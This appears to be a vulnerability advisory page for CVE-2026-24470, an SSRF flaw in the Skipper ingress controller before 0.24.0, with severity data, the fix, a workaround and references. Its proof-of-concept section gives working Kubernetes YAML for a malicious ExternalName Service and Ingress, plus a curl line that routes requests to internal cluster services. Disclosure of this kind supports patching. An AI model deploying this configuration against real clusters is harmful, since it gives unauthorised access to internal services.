Security Vulnerability Report
CVE-2026-24470 CVSS 8.1 HIGH

Published: 2026-01-26 23:16:09
Last Modified: 2026-02-18 17:39:44

Description

Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.24.0, when running Skipper as an Ingress controller, users with permissions to create an Ingress and a Service of type ExternalName can create routes that let them use Skipper's network access to reach internal services. Version 0.24.0 disables Kubernetes ExternalName support by default. As a workaround, operators can allow-list the targets of ExternalName Services, including allow-listing by regular expression.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zalando:skipper:*:*:*:*:*:*:*:* - VULNERABLE
Skipper < 0.24.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# CVE-2026-24470 PoC - Skipper Ingress Controller Security Bypass
# This PoC demonstrates how an attacker with low privileges can access internal services

# Step 1: Create a malicious ExternalName Service pointing to an internal service
apiVersion: v1
kind: Service
metadata:
  name: malicious-externalname
  namespace: attacker-namespace
spec:
  type: ExternalName
  externalName: internal-service.default.svc.cluster.local
---
# Step 2: Create an Ingress to route external traffic through Skipper to the ExternalName Service
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: malicious-ingress
  namespace: attacker-namespace
  annotations:
    kubernetes.io/ingress.class: skipper
spec:
  rules:
  - host: attacker.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: malicious-externalname
            port:
              number: 80
---
# Exploit: Send a request through Skipper to access the internal service
# curl -H 'Host: attacker.example.com' http://<skipper-ingress-ip>/
# The request will be forwarded to internal-service.default.svc.cluster.local

Weaknesses

CWE-441 (Unintended Proxy or Intermediary)
CWE-918 (Server-Side Request Forgery)

References

https://github.com/zalando/skipper/commit/a4c87ce029a58eb8e1c2c1f93049194a39cf6219 - Patch
https://github.com/zalando/skipper/security/advisories/GHSA-mxxc-p822-2hx9 - Vendor Advisory, Mitigation
https://kubernetes.io/docs/concepts/services-networking/service/#externalname - Product (Kubernetes ExternalName documentation)

Record Status: Analyzed